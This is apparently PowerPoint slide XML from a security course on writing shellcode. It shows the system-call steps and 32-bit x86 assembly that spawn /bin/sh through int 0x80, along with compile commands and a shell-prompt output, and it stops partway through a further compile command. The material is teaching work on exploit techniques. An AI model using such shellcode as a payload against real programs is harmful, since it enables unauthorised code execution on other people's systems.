            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Invoking the System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540677" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy 0xb into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the address of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the null word into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x80 instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy 0x1 into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy 0x0 into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x80 instruction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121989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06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067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067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067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067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067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067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4067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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preliminary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	.string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 	$11,</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	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push 	$0	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   	$0x80	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  	$0x1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%ebx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074289" y="1252960"/>
            <a:ext cx="5069711" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>preliminary_shellcode.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-41.$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72432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2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27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27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27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272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4272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4272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4272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4272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4272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4272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4272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4272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42723">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42723">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Preliminary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>preliminary_shellcode.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
